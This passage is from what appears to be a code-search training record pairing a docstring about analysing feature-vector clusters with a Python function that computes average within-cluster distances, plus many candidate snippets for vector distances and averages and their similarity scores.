values at each position in the two vectors\n return sum/count", "def euclidean_distance(vector1, vector2):\n e_dist = [(v1 - v2) ** 2 for v1, v2 in zip(vector1, vector2)]\n e_dist = math.sqrt(sum(e_dist))\n return e_dist", "def pearson_distance(vector1, vector2) :\n sum1 = sum(vector1)\n sum2 = sum(vector2)\n\n sum1Sq = sum([pow(v,2) for v in vector1])\n sum2Sq = sum([pow(v,2) for v in vector2])\n\n pSum = sum([vector1[i] * vector2[i] for i in range(len(vector1))])\n\n num = pSum - (sum1*sum2/len(vector1))\n den = math.sqrt((sum1Sq - pow(sum1,2)/len(vector1)) * (sum2Sq - pow(sum2,2)/len(vector1)))\n\n if den == 0 : return 0.0\n return 1.0 - num/den", "def hellinger_dist(v1, v2):\n if len(v1) != len(v2):\n raise ValueError(\"Vectors should have the same size! \")\n return sqrt( sum( map(lambda e: \n (sqrt(e[0])-sqrt(e[1]))**2, zip(v1,v2))))/sqrt(2)", "def avg(vector):\n if len(vector) == 0:\n return 0\n return sum(vector) / len(vector)", "def euclidean_distance(list1, list2):\n # Make sure we're working with lists\n # Sorry, no other iterables are permitted\n assert isinstance(list1, list)\n assert isinstance(list2, list)\n\n dist = 0\n\n # 'zip' is a Python builtin, documented at\n # <http://www.python.org/doc/lib/built-in-funcs.html>\n for item1, item2 in zip(list1, list2):\n dist += (item2 - item1)**2\n return math.sqrt(dist)", "def euclidean_distance(a: Tuple[float, ...], b: Tuple[float, ...]) -> float:\n assert len(a) == len(b)\n return sqrt(sum(pow(x[0] - x[1], 2) for x in zip(a, b)))", "def dist(self, a, b, l):\n # works for non-arrays\n return sum( ((i-j)/k)**2 for i,j,k in zip(a, b, l) )", "def computeMeans(list_of_lists):\n # Find length of longest list\n longest = 0\n for lst in list_of_lists:\n if len(lst) > longest:\n longest = len(lst)\n # Get totals\n tots = [0]*(longest)\n for lst in list_of_lists:\n for i in range(longest):\n if i < len(lst):\n tots[i] += lst[i]\n else:\n tots[i] += lst[-1]\n # Convert tots to an array to make averaging across each index easier\n tots = pylab.array(tots)\n # Compute means\n means = tots/float(len(list_of_lists))\n return means", "def computeMeans(list_of_lists):\n # Find length of longest list\n longest = 0\n for lst in list_of_lists:\n if len(lst) > longest:\n longest = len(lst)\n # Get totals\n tots = [0]*(longest)\n for lst in list_of_lists:\n for i in range(longest):\n if i < len(lst):\n tots[i] += lst[i]\n else:\n tots[i] += lst[-1]\n # Convert tots to an array to make averaging across each index easier\n tots = pylab.array(tots)\n # Compute means\n means = tots/float(len(list_of_lists))\n return means", "def compare_vectors(v1, v2):\n if len(v1) == len(v2):\n distance = 0\n for i in xrange(len(v1)):\n distance += (v1[i] - v2[i]) ** 2\n return distance\n else:\n print \"vector not match in dimensions\"", "def add_vectorlist(vectors):\n x, y, z = zip(*vectors)\n return sum(x), sum(y), sum(z)", "def average_distance(l1, l2, distance_function=None):\n\n if not distance_function:\n distance_function = levenshtein_ratio\n counter = 0.0\n numerator = 0.0\n \n #compute array of values\n# if not l1 or not l2:\n# return 1.0\n #make l1 the shortes\n l1, l2 = len(l1)<len(l2) and (l1, l2) or (l2, l1)\n \n #compute the distrances\n distances = []\n for s1 in l1:\n distances += [(distance_function(s1, s2), s1, s2) for s2 in l2]\n# ls.sort(reverse=True)\n# distances.append((ls, s1))\n distances.sort(reverse=True)\n #compute maxima for each colum and each row\n done = set()\n for d, s1, s2 in distances:\n if s1 not in done and s2 not in done:\n done.add(s1)\n done.add(s2) \n counter += d\n numerator += 1\n #if there is a difference in length, we penalize for each item \n difference = len(l2) - len(l1)\n counter += .8 * difference\n numerator += difference\n if numerator == 0:\n return 1.0\n return counter/numerator", "def vector_sum(vectors):\n results = vectors[0]\n for vector in vectors[1:]:\n results = vector_add(results, vector)\n return results", "def average_distance(self):\r\n total = 0\r\n edges = 0\r\n for code, _list in self.edges.items():\r\n for edge in _list:\r\n total += edge.distance\r\n edges += 1\r\n return total / edges", "def obtain_pairwise_distances(normal, abnormal, num_comparisons):\n avg_dist = np.zeros(len(DIST_METRICS), dtype=float)\n for i, metric in enumerate(sorted(DIST_METRICS)):\n\n # Iterate through all combinations of pairs of vectors\n for idx_g1 in range(len(normal)):\n for idx_g2 in range(len(abnormal)):\n t1 = normal[idx_g1]\n t2 = abnormal[idx_g2]\n\n # Determine which metric to compute by indexing dictionary\n dist = DIST_METRICS[metric](t1, t2)\n avg_dist[i] = avg_dist[i] + dist\n\n # Compute the average\n avg_dist = avg_dist / num_comparisons\n\n return avg_dist", "def compute_pairwise_distances(input_vecs: types.Tensor) -> types.Tensor:\n r = tf.reduce_sum(input_vecs * input_vecs, axis=1, keepdims=True)\n pdistance_matrix = (\n r\n - 2 * tf.matmul(input_vecs, input_vecs, transpose_b=True)\n + tf.transpose(r)\n )\n return tf.cast(pdistance_matrix, dtype=tf.float32)", "def vector_weighted_average(vf, weights):\n weights_sum = weights.sum()\n y_average = (vf[:,:,0] * weights).sum() / weights_sum\n x_average = (vf[:,:,1] * weights).sum() / weights_sum\n return np.array([y_average, x_average])", "def euclidean_distance(vector_1, vector_2) -> float:\n\n\n before_square_root = 0\n for i in range(len(vector_1)):\n before_square_root += (vector_1[i] - vector_2[i])**2\n\n d = math.sqrt(before_square_root)\n print(d)\n return(d)", "def distance(p1, p2):\n\n \"\"\"\n (p1[0] - p2[0]) ** 2 + \n (p1[1] - p2[1]) ** 2 + \n \"\"\"\n sum_all = 0\n for i, v in enumerate(p1):\n diff_squared = (v - p2[i]) ** 2\n sum_all += diff_squared\n return(math.sqrt(sum_all))", "def vector_dist(v, w):\n if isinstance(v, list):\n v = np.asarray(v)\n return vector_mag(v - w)", "def average(coords):\n x = 0\n y = 0\n for coord in coords:\n x += coord[0]\n y += coord[1]\n count = len(coords)\n return (x/count, y/count)", "def get_average_of_elements(first_list, second_list):\r\n count = 0\r\n for x in first_list:\r\n if first_list not in second_list:\r\n count += x\r\n return count // len(first_list)", "def deviationAvg(xs):\n\treturn deviation(xs) / sqrt(len(xs))", "def avg(u: np.ndarray, v: np.ndarray) -> np.ndarray:\n \n return (u + v) / 2.0", "def avg(list):\n return sum(list) / len(list)", "def compute_euclidean_dist(vec1, vec2):\r\n assert len(vec1) == len(vec2)\r\n vec1 = np.array(vec1)\r\n vec2 = np.array(vec2)\r\n return np.sqrt(np.sum(np.square(vec2 - vec1)))", "def vector_sum(vectors):\n\tresult = vectors[0]\n\tfor vector in vectors:\n\t\tresult = vector_add(result, vector)\n\treturn result", "def price_average(lst):\n\n return sum(lst) / len(lst)", "def norm_dist(face_vectors, f_vector):\n if len(face_vectors) == 0:\n return np.empty((0))\n return np.linalg.norm(face_vectors - f_vector, axis=1)", "def std(l: List[float]) -> float:\n n = len(l)\n if n == 0:\n return 0\n avg = average(l)\n return sqrt(sum([(avg - i) * (avg - i) for i in l]))", "def EuclideanDistanceSq( self, a, b ):\n if not (type(a) == list or type(a) == Vector):\n a = [a]\n if not (type(b) == list or type(a) == Vector):\n b = [b]\n assert len(a) == len(b)\n sqDist = 0\n for x,y in zip(a,b):\n sqDist += (x-y)**2\n return sqDist", "def get_average_vec(tokens_list, vector, generate_missing=False, k=300):\r\n if len(tokens_list)<1:\r\n return np.zeros(k)\r\n \r\n if generate_missing:\r\n vectorized = [vector[word] if word in vector else np.random.rand(k) for word in tokens_list]\r\n else:\r\n vectorized = [vector[word] if word in vector else np.zeros(k) for word in tokens_list]\r\n \r\n length = len(vectorized)\r\n summed = np.sum(vectorized, axis=0)\r\n averaged = np.divide(summed, length)\r\n return averaged", "def get_euclid_dist(vec_1, vec_2):\n\n\treturn np.sqrt(np.sum(np.fabs(vec_1 - vec_2), axis=1)).flatten()", "def average_double_pts(elev_list, dist_list, minimum_point_distance=0.5):\n import numpy as np\n\n dist_array = np.array(dist_list)\n\n diffs = dist_array[1:] - dist_array[:-1]\n bad_pts = diffs < minimum_point_distance\n bad_indices = [i for i in range(len(bad_pts)) if bad_pts[i]]\n\n new_elev_array = np.array(elev_list)\n\n for i in bad_indices:\n mean_elevation = (elev_list[i] + elev_list[i+1])/2\n new_elev_array[i] = mean_elevation\n new_elev_array[i+1] = mean_elevation\n\n new_dist_array = dist_array[0:-1]\n new_dist_array = new_dist_array[np.logical_not(bad_pts)]\n\n new_elev_array = np.array(new_elev_array[0:-1], copy=True)\n new_elev_array = new_elev_array[np.logical_not(bad_pts)]\n\n new_dist_list = list(new_dist_array)\n new_dist_list.append(dist_list[-1])\n new_elev_list = list(new_elev_array)\n new_elev_list.append(elev_list[-1])\n\n return new_elev_list, new_dist_list", "def distance_vectors_pairwise(anchor, positive, negative):\n\n a_sq = torch.sum(anchor * anchor, dim=1)\n p_sq = torch.sum(positive * positive, dim=1)\n n_sq = torch.sum(negative * negative, dim=1)\n\n eps = 1e-8\n d_a_p = torch.sqrt(a_sq + p_sq - 2*torch.sum(anchor * positive, dim = 1) + eps)\n d_a_n = torch.sqrt(a_sq + n_sq - 2*torch.sum(anchor * negative, dim = 1) + eps)\n d_p_n = torch.sqrt(p_sq + n_sq - 2*torch.sum(positive * negative, dim = 1) + eps)\n return d_a_p, d_a_n, d_p_n", "def euclidean_distance(vector_1: Vector, vector_2: Vector) -> VectorOut:\n return np.sqrt(np.sum((np.asarray(vector_1) - np.asarray(vector_2)) ** 2))", "def func(lst):\n tot = 0\n for i in lst:\n tot = tot + i\n avg = tot / len(lst)\n return avg", "def CalculateListAverage(values):\n if not values:\n return 0\n return sum(values) / float(len(values))", "def euclidean_distance(vector_x, vector_y):\n if len(vector_x) != len(vector_y):\n raise Exception('Vectors must be same dimensions')\n return math.sqrt(sum((vector_x[dim] - vector_y[dim]) ** 2 for dim in range(len(vector_x))))", "def get_distance(self, vec):\r\n\r\n sum = 0\r\n if len(self.weights) == len(vec):\r\n for i in range(len(vec)):\r\n sum += (self.weights[i] - vec[i]) * (self.weights[i] - vec[i])\r\n return np.sqrt(sum)\r\n else:\r\n sys.exit(\"Error: dimension of nodes != input data dimension!\")", "def cal_distances(embeddings):\n # calculate\n dist = np.zeros([len(embeddings), len(embeddings)], dtype=float)\n for ii in xrange(len(embeddings)):\n for jj in xrange(ii + 1, len(embeddings)):\n dist[ii, jj] = np.linalg.norm(embeddings[ii] - embeddings[jj])\n dist[jj, ii] = dist[ii, jj] \n \n # return\n return dist", "def genre_average(genre_vectors):\n array = [vector for vector in genre_vectors]\n return np.average(array, axis=0)", "def _avg_sd_from_list(lst):\n arr = flex.double(lst)\n avg = round(flex.mean(arr), 5)\n std = round(arr.standard_deviation_of_the_sample(), 5)\n return avg, std", "def get_distance(list1, list2):\n import math\n distance_result = (list1[0] - list2[0]) ** 2 + (list1[1] - list2[1]) ** 2 + (list1[2] - list2[2]) ** 2\n return math.sqrt(abs(distance_result))", "def _calculate_distance(self, ordered_list):\r\n\r\n total_distance = 0\r\n previous_point = None\r\n for point in ordered_list:\r\n if previous_point is not None:\r\n angle, distance = previous_point.angleAndDistanceTo(point) # geodesic distance in meters\r\n total_distance += distance\r\n previous_point = point\r\n\r\n return total_distance", "def DifferenceVectors(alist,blist):\n #alist a molecule\n #blist b molecule\n #d difference of two sparce vectors in power of 2\n A=set(alist)\n B=set(blist)\n D=int(len(A.difference(B))+len(B.difference(A)))\n return D", "def stat(lst):\n n = float(len(lst))\n mean = sum(lst) / n\n stdev = sqrt((sum(x * x for x in lst) / n) - (mean * mean))\n return mean, stdev", "def distance(self, vector1, vector2):\n\t\tsum_sq = 0\n\t\tfor i in range(28):\n\t\t\tfor j in range(28):\n\t\t\t\tsum_sq += (vector1[i][j] - vector2[i][j])**2\n\t\treturn math.sqrt(sum_sq)", "def compute_distance (uVector, uOther):\n ## since each element can be either 0 or 1,\n ## no need for square roots and pow\n d = 0\n for i in range (len(uVector)):\n d = d + math.pow((int(uVector [i]) - int(uOther [i])), 2)\n\n return d", "def distance(v: Vector, w: Vector) -> float:\n return magnitude(subtract(v, w))", "def euclidean_distance_no_np(vector_1: Vector, vector_2: Vector) -> VectorOut:\n return sum((v1 - v2) ** 2 for v1, v2 in zip(vector_1, vector_2)) ** (1 / 2)", "def inter_distance(point,*args):\n\tdists = []\n\tfor clust in args:\n\t\tdistance = 0\n\t\tfor val in clust:\n\t\t\tdistance += L2(point,val)\n\n\t\tif len(clust) == 1:\n\t\t\tdists.append(distance)\n\t\telse:\n\t\t\tdists.append(distance/len(clust))\n\n\t\t\n\treturn min(dists)", "def euclidean_distance(vec1, vec2):\n return numpy.linalg.norm(vec1 - vec2)", "def get_distance_metrics(source_embeddings, target_embeddings):\n cosine_avg, euclidean_avg = 0.0, 0.0\n for i in range(len(source_embeddings)):\n cosine_avg += cosine(source_embeddings[i], target_embeddings[i])\n euclidean_avg += euclidean(source_embeddings[i], target_embeddings[i])\n return (cosine_avg / len(source_embeddings)), (euclidean_avg / len(source_embeddings))", "def average(l):\n return float(sum(l)/len(l))", "def average(lst):\n return sum(lst)/len(lst)", "def normalize(vectors):\n\n vectors = list(vectors)\n mins = [min(x) for x in zip(*vectors)]\n maxs = [max(x) for x in zip(*vectors)]\n for vector in vectors:\n yield [(number - min_) / (max_ - min_)\n for min_, max_, number in zip(mins, maxs, vector)]", "def deviation(xs):\n\ta = avg(xs)\n\treturn sqrt(sum([(x - a) ** 2 for x in xs]) / (len(xs) - 1))", "def vector_sum(vectors: List[Vector]) -> Vector:\n assert vectors, 'no vectors provided'\n\n num_elements = len(vectors[0])\n assert all(\n len(v) == num_elements for v in vectors), 'vectors must be the same length'\n\n return [sum(vec[i] for vec in vectors) for i in range(num_elements)]", "def vector_sum(vectors: List[Vector]) -> Vector:\n # Check that vectors is not empty\n assert vectors, \"no vectors provided!\"\n\n # Check the vectors are all the same size\n num_elements = len(vectors[0])\n assert all(len(v) == num_elements for v in vectors), \"different sizes!\"\n\n # the i-th element of the result is the sum of every vector[i]\n return [sum(vector[i] for vector in vectors)\n for i in range(num_elements)]", "def avg_dists(self):\n \n d = self.descriptors\n # make an empty array to fill b/c it is a touch faster\n averages = np.empty([1, self.d_length])\n for i, u in enumerate(d):\n s = 0\n for j, v in enumerate(d):\n if i != j:\n s += self.jaccard(u, v)\n averages[0, i] = (s / (self.d_length-1))\n return averages[0]", "def sum_of_squares(v: Vector) -> float:\n return dot(v,v)", "def euclidean_distance(s1,s2): \n tmpsum = 0\n \n for index,value in enumerate(s1):\n tmpsum += (s1[index]-s2[index])**2\n \n return math.sqrt(tmpsum)", "def vector_sum(vectors: List[Vector]) -> Vector:\n # Check that vectors is not empty\n assert vectors, \"no vectors provided!\"\n\n # Check the vectors are all the same size\n num_elements = len(vectors[0])\n assert all(len(v) == num_elements for v in vectors), \"different sizes!\"\n\n return [sum(vector[i] for vector in vectors)\n for i in range(num_elements)]", "def calcEuclideanDistance(d1, d2):\n #initiate empty list\n result = []\n #for each index in the list, each position in both list minus each other\n #and to the power of two. Add this in the result list\n for idx in range(len(d1)):\n result.append((d1[idx]-d2[idx])**2)\n\n #Return the square of the sum of all values in the result list\n return math.sqrt(sum(result))", "def get_distance(descriptive_vector1, descriptive_vector2 ):\n return np.linalg.norm(descriptive_vector1 - descriptive_vector2)", "def norm(vector):\r\n result = 0\r\n # initial value for the result of this function\r\n for z in range(len(vector)):\r\n # this loop will continue as long as there are more values in the list \r\n result += vector[z]**2\r\n result = result**.5\r\n # The two equations above find the sum of the squares and then the square root of the squares\r\n return result", "def norm(vec):\n return sqrt(sum([i**2 for i in vec]))", "def average(ls):\n\n if len(ls) == 0:\n return 0.0\n\n sm = sum(ls)\n return sm / len(ls)", "def dist_squared (a, b):\n return sum(map(lambda (x,y): (x-y)**2, zip(a, b)))", "def avg(l):\n return (sum(l)/float(len(l)))", "def calculateEuclideanDistance(vector):\r\n global euclideanDistance\r\n # create linkage matrix with the distance metric as euclidean distance\r\n # calculate the distances of the clusters by starting as singletons\r\n # and in each iteration will merge the two clusters which have the smallest distance\r\n # returns array of length n - 1\r\n # Z[i] will tell us which clusters were merged in the i-th iteration\r\n # each row has format [cluster1, cluster1, dist, sample_count].\r\n euclideanDistance = linkage(vector, metric='euclidean')", "def weighted_average(listofvalues):\n total = 0\n weights = 0\n for [w, v] in listofvalues:\n total += w*v\n weights += w\n return total/weights", "def distance_sq(self, other_vector):\n return sum((x - y) ** 2 for x, y in zip(self.vector, other_vector))", "def get_aggregate_vector(vectors):\n\n aggregate_vector = np.zeros((300, 1))\n for vec in vectors:\n vec = np.array(vec).reshape(300, 1)\n aggregate_vector += vec\n\n aggregate_vector = aggregate_vector / len(vectors)\n return aggregate_vector", "def compute_object_average_surface_distances(labelled_surface_distances_1, labelled_surface_distances_2):\n asd_label_1 = []\n for surface_distance in labelled_surface_distances_1:\n asd_label_1.append(np.mean(surface_distance))\n\n asd_label_2 = []\n for surface_distance in labelled_surface_distances_2:\n asd_label_2.append(np.mean(surface_distance))\n\n return (\n np.array(asd_label_1),\n np.array(asd_label_2),\n )", "def _weightedAverage(list_):\n\n\t\taccum = [0, 0]\n\n\t\tfor point, weight in list_:\n\n\t\t\taccum[0] += point[0] * weight\n\t\t\taccum[1] += point[1] * weight\n\n\t\ttotalWeight = sum([weight for point, weight in list_])\n\n\n\t\tif totalWeight == 0:\n\t\t\t\n\t\t\treturn (0, 0)\n\n\n\t\taccum[0] /= float(totalWeight)\n\t\taccum[1] /= float(totalWeight)\n\n\t\treturn (accum[0], accum[1])", "def avg(lst: list):\n return sum(lst) / len(lst)", "def __calculate_average_distance(self):\n game = self.__game # type: Game\n all_icebergs = game.get_all_icebergs()\n all_icebergs_length = len(all_icebergs)\n sum_distances = 0\n for i in range(all_icebergs_length):\n for j in range(i + 1, all_icebergs_length):\n iceberg1 = all_icebergs[i]\n iceberg2 = all_icebergs[j]\n sum_distances += iceberg1.get_turns_till_arrival(iceberg2)\n\n return sum_distances / (all_icebergs_length * (all_icebergs_length - 1) / 2)", "def sum_of_squares(v: Vector) -> float:\n return dot(v, v)", "def sum_of_squares(v: Vector) -> float:\n return dot(v, v)", "def sum_of_squares(v: Vector) -> float:\n return dot(v, v)", "def test_vector_dist(self):\r\n v1 = [1, 4, 2]\r\n v2 = [-1, 12, 4]\r\n\r\n exp = 8.48528137424\r\n obs = self.best._vector_dist(v1, v2)\r\n assert_almost_equal(exp, obs)\r\n\r\n v1 = [1, 2, 100, 4, 2]\r\n v2 = [-1, 12, 4, 12, 99]\r\n\r\n exp = 137.087563258\r\n obs = self.best._vector_dist(v1, v2)\r\n assert_almost_equal(exp, obs)" ]
[ "0.7456902", "0.7266837", "0.7161427", "0.66369", "0.66369", "0.6613315", "0.6526983", "0.6526983", "0.652161", "0.652161", "0.652161", "0.6493121", "0.6426592", "0.641932", "0.61453825", "0.6135802", "0.6098236", "0.60969055", "0.60628074", "0.6040219", "0.6035585", "0.6013587", "0.5990824", "0.5973708", "0.5933027", "0.5933027", "0.58944213", "0.5887823", "0.58707106", "0.58558226", "0.58500975", "0.58468646", "0.5821706", "0.5813525", "0.5793884", "0.57928586", "0.5791478", "0.5783578", "0.5774629", "0.5741828", "0.57401866", "0.57379985", "0.57379174", "0.57365155", "0.57356507", "0.5721594", "0.5711495", "0.57106465", "0.5709194", "0.570738", "0.56993973", "0.5690193", "0.56852686", "0.5685154", "0.5680904", "0.5664199", "0.56614834", "0.5657509", "0.5656348", "0.5654142", "0.56380755", "0.5636283", "0.56110585", "0.56103873", "0.5608834", "0.5607497", "0.560002", "0.5597526", "0.5585994", "0.5582634", "0.55804646", "0.55768186", "0.5575889", "0.5571256", "0.5563191", "0.5562181", "0.55573595", "0.5556962", "0.55557835", "0.55549186", "0.5554202", "0.55511165", "0.5551053", "0.55510396", "0.5544279", "0.55419123", "0.55412364", "0.55406207", "0.5539833", "0.5537789", "0.553624", "0.55332893", "0.55329734", "0.55296797", "0.55225855", "0.5521511", "0.55192345", "0.55192345", "0.55192345", "0.5512115" ]
0.8062336
0
Reads feature vectors and labels from a file and prints information about their clustering properties. Here, we think of the space of feature vectors, and consider a vector v_i to be in cluster j if j is one of the labels for example i.
def analyze_feature_vector_clusters(features_file_path, distance=utils.L2_distance): feature_vectors, label_vectors = utils.read_feature_and_label_vectors(features_file_path) logging.info('Building clusters...') # Map from (integer j) --> (list of indices i such that feature_vectors[i] is in cluster j) # Cluster 0 indicates no disease indices_for_label = map_labels_to_example_indices(label_vectors) logging.info('...done.') logging.info('Computing global and within-cluster average distances') # Compute average distance between vectors overall global_average_distance = average_distance_between_vectors(feature_vectors, distance) logging.info('Global average ' + distance.__name__ + ' between vectors: ' + str(global_average_distance)) # Compute average distance within each cluster for j, vector_indices in indices_for_label.items(): vectors_in_cluster = [feature_vectors[index] for index in vector_indices] average_cluster_distance = average_distance_between_vectors(vectors_in_cluster, distance) logging.info('Average ' + distance.__name__ + ' between vectors in cluster ' + str(j) + ': ' + str(average_cluster_distance))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load_vectors (file_extension = None):\n \n feat_file_name = 'output/' + file_extension + '.feature'\n label_file_name = 'output/' + file_extension + '.label'\n \n prettyPrint( \"Loading feature vectors and labels from disk ... \", color.CYAN)\n if not os.path.isfile(feat_file_name) or not os.path.isfile(label_file_name):\n prettyPrint(\"Feature vector files {0} could not be found. Generating from scratch instead ...\".format(feat_file_name), color.CYAN)\n return None, None\n with open(feat_file_name, 'r') as f:\n feat_vec = pickle.load(f)\n with open(label_file_name, 'r') as f:\n labels = pickle.load(f)\n\n prettyPrint (\"Done loading feature vectors.\", color.CYAN)\n return feat_vec, labels", "def sent_or_doc_cluster(file_in, file_out, feature, method, n_cluster, show_or_write):\n\n original_file = file_in[0]\n original_words_file = file_in[1]\n file_vec = file_in[2]\n\n if feature.lower() == 'onehot':\n with open(file_vec, 'rb') as f_in:\n content_id = pickle.load(f_in)\n id_vec = pickle.load(f_in)\n id_onehot = pickle.load(f_in)\n x = []\n for i, onehot in id_onehot.items():\n x.append(onehot.tolist())\n\n X = np.array(x)\n\n if method.lower() == 'ap':\n instance = AffinityPropagation(affinity='cosine').fit(X)\n elif method.lower() == 'kmeans':\n instance = KMeans(n_cluster=n_cluster).fit(X)\n\n labels = instance.labels_.tolist()\n id_cluster = {}\n cluster_ids = {}\n for i in range(len(labels)):\n id_cluster[i] = labels[i]\n\n for i, cluster in id_cluster.items():\n if cluster not in cluster_ids:\n cluster_ids[cluster] = []\n cluster_ids[cluster].append(i)\n else:\n cluster_ids[cluster].append(i)\n pass\n if show_or_write == 'show':\n show(original_file, cluster_ids)\n else:\n keycontent_cluster_write_to_file(\n file_in=[original_file, original_words_file],\n file_out=file_out[0],\n id_cluster\n )\n keycontent_cluster_digest(\n file_in=[original_file, original_words_file],\n file_out=file_out[1],\n cluster_ids=cluster_ids\n )\n pass\n\n elif feature.lower() == 'vec':\n with open(file_vec, 'rb') as f_in:\n content_id = pickle.load(f_in)\n id_vec = pickle.load(f_in)\n id_onehot = pickle.load(f_in)\n x = []\n for i, vec in id_vec.items():\n x.append(vec.tolist()) # int object jas nor attribute 'tolist'\n\n X = np.array(x)\n\n if method.lower() == 'ap':\n instance = AffinityPropagation(affinity='cosine').fit(X)\n elif method.lower() == 'kmeans':\n instance = KMeans(n_clusters=n_cluster).fit(X)\n else:\n raise ValueError(\"Method must be 'ap' or \"\n \"'kmeans'. Got %s instead\"\n % method)\n\n labels = instance.labels_.tolist()\n id_cluster = {}\n cluster_ids = {}\n for i in range(len(labels)):\n id_cluster[i] = labels[i]\n\n for i, cluster in id_cluster.items():\n if cluster not in cluster_ids:\n cluster_ids[cluster] = []\n cluster_ids[cluster].append(i)\n else:\n cluster_ids[cluster].append(i)\n if show_or_write == 'show':\n show(original_file, cluster_ids)\n else:\n keycontent_cluster_write_to_file(\n file_in=[original_file, original_words_file],\n file_out=file_out[0],\n id_cluster\n )\n keycontent_cluster_digest(\n file_in=[original_file, original_words_file],\n file_out=file_out[1],\n cluster_ids=cluster_ids\n )\n pass\n elif feature.lower() == 'doc2vec':\n # word2vec.doc2vec\n pass\n else:\n raise ValueError(\n \"Feature must be 'onehot' or 'vec' or 'doc2vec'. Got %s instead\" % feature)\n pass\n\n pass", "def print_clusters(vectors, labels, nclusters, show=False):\n plt.figure(1)\n plt.clf()\n\n vecs2D = TSNE(n_components=2).fit_transform(vectors)\n\n colors = cycle('bgrcmykbgrcmykbgrcmykbgrcmyk')\n for k, col in zip(range(nclusters), colors):\n my_members = labels == k\n\n cluster_vecs2D = vecs2D[my_members, :]\n\n print(cluster_vecs2D)\n print(cluster_vecs2D[:,0])\n print(cluster_vecs2D[:,1])\n\n plt.scatter(cluster_vecs2D[:,0], \n cluster_vecs2D[:,1], \n c=col, \n label='cluster {}'.format(k))\n\n plt.title('Estimated clusters')\n plt.legend()\n\n if show:\n plt.show()\n\n cwd = os.getcwd()\n if not os.path.exists(cwd+\"/plots\"):\n os.makedirs(cwd+\"/plots\")\n plt.savefig(cwd+'/plots/clusters.png')", "def read_data(feature_file, label_file):", "def load_libsvm_file(file, labels_format=\"list\", sort_indices=False):\n if labels_format == 'list':\n labels, features = _load_libsvm_file_labels_list(file, sort_indices)\n return csr_matrix(features), labels\n elif labels_format == 'csr_matrix':\n labels, features = _load_libsvm_file_labels_csr_matrix(file, sort_indices)\n return csr_matrix(features), csr_matrix(labels)\n else:\n raise ValueError(\"Label format {} is not valid format\".format(labels_format))", "def creating_feature_vector():\r\n\twordlist = []\r\n\tlabel = \"\"\r\n\tfw = open(\"feature_vector.txt\", \"w+\", encoding = \"utf-8\")\r\n\twith open(\"D:\\\\Python_Prac\\\\wordstag\\\\modules\\\\HI_EN_TRAIN.txt\", \"r\", encoding = \"utf-8\") as f:\r\n\t\tfor line in f:\r\n\t\t\twordlist.append(line)\r\n\t\tfor index, line in enumerate(wordlist):\r\n\t\t\tif line == \"\\n\":\r\n\t\t\t\tcontinue\r\n\t\t\tcontext = line.split(\"\\t\")\r\n\t\t\tlabel = context[1]\r\n\t\t\tfeature_vector = label+\" \"\r\n\t\t\tngram_vector = ngram_frequency(str(context[0]))\r\n\t\t\tfor vector in ngram_vector:\r\n\t\t\t\tfeature_vector += str(vector)+\" \"\r\n\t\t\tfeature_vector += str(is_english(context[0]))+\" \"\r\n\t\t\tfeature_vector += str(is_hindi(context[0]))+\" \"\r\n\t\t\tfeature_vector += str(is_abbr(context[0]))+\" \"\r\n\t\t\tfeature_vector += str(med_in_english(context[0]))+\" \"\r\n\t\t\tfeature_vector += str(med_in_hindi(context[0]))+\" \"\r\n\t\t\tbefore = [0,0,0]\r\n\t\t\tafter = [0,0,0]\r\n\t\t\tfor i in range(3):\r\n\t\t\t\tif (index-i) < 0 or (index-i+1) > len(wordlist)-1:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tbefore[2-i] = get_word_context(wordlist[index-i+1].split(\"\\t\")[0])\r\n\t\t\tfor i in range(3):\r\n\t\t\t\tif (index+i+1) > len(wordlist)-1:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tafter[2-i] = get_word_context(wordlist[index+i+1].split(\"\\t\")[0])\r\n\t\t\tfor i in before:\r\n\t\t\t\tfeature_vector += str(i)+\" \"\r\n\t\t\tfor i in after:\r\n\t\t\t\tfeature_vector += str(i)+\" \"\r\n\t\t\tfeature_vector += \"\\n\"\r\n\t\t\tfw.write(feature_vector)\r\n\t\t\tprint(\"Proceeding...\"+str(index+1)+\" of 16683\")\r\n\r\n\tfw.close()", "def load_glove_vec(fname):\n word_vecs = {}\n length = 0\n with open(fname, \"rb\") as f:\n for i, line in enumerate(f):\n L = line.split()\n word = L[0].lower()\n word_vecs[word] = np.array(L[1:], dtype='float32')\n if length == 0:\n length = len(word_vecs[word])\n return word_vecs, length", "def get_features_from_file(self):\n f_list = []\n f = open(\"verifiability_features.txt\", \"r\")\n for line in f:\n f_list.append(line)\n self.features = f_list", "def get_features_from_file(self):\n f_list = []\n f = open(\"verifiability_features.txt\", \"r\")\n for line in f:\n f_list.append(line)\n self.features = f_list", "def load_glove_vectors(filename, vocab):\n dct = {}\n vectors = array.array('d')\n current_idx = 0\n with open(filename, \"r\", encoding=\"utf-8\") as f:\n for _, line in enumerate(f):\n tokens = line.split(\" \")\n word = tokens[0]\n entries = tokens[1:]\n if not vocab or word in vocab:\n dct[word] = current_idx\n vectors.extend(float(x) for x in entries)\n current_idx += 1\n word_dim = len(entries)\n num_vectors = len(dct)\n return [np.array(vectors).reshape(num_vectors, word_dim), dct]", "def main():\n\n# The following codes loads the data set into a 2D np array called data\n\twith open('complete_data.csv') as features_file:\n\t\tcsv_reader = csv.DictReader(features_file, delimiter = ',')\n\t\tdata = []\n\t\tcounter = 0\n\t\tfor row in csv_reader:\n\t\t\tprint(\"csv_reader row:\", row)\n\t\t\t# if(counter == 20):\n\t\t\t# \tbreak\n\t\t\tcounter+=1\n\t\t\tcleaned_row = []\n\t\t\tcleaned_row.append(row['track'])\n\t\t\tcleaned_row.append(row['loudness'])\n\t\t\tcleaned_row.append(row['score'])\n\t\t\tdata.append(np.array(cleaned_row))\n\t\tdata = random.sample(list(data), 30)\n\t\tdata = np.array(data)\n\n\n\tX = []\n\tY = []\n\tcounter = 0\n\tfor row in data:\n\t\t# if(counter == 10):\n\t\t# \tbreak\n\t\t# counter+=1\n\t\tY.append(row[0])\n\t\tl = [float(i) for i in row[1:]]\n\t\tX.append(l)\n\tX = np.array(X)\n\tY = np.array(Y)\n\n\tcentroid_indices2,centroids2 = sk_learn_cluster(X,Y,3)\n\n\tplot_word_clusters(data, centroids2, centroid_indices2 )", "def _extractGloveVects():\n \n embeddings_index = {}\n\n with open(GLOVE_CORPUS_FILE) as f:\n for line in f:\n values = line.split()\n word = values[0].lower()\n if word not in _cachedStopWords:\n coefs = np.asarray(values[1:], dtype='float32')\n 